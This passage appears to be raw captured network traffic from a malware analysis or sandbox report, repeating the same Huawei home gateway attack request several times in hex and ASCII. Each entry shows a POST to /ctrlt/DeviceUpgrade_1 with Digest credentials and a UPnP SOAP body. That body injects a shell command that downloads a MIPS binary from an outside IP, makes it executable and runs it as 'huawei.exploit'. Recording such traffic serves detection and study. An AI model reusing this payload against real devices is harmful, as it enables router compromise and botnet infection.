2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; 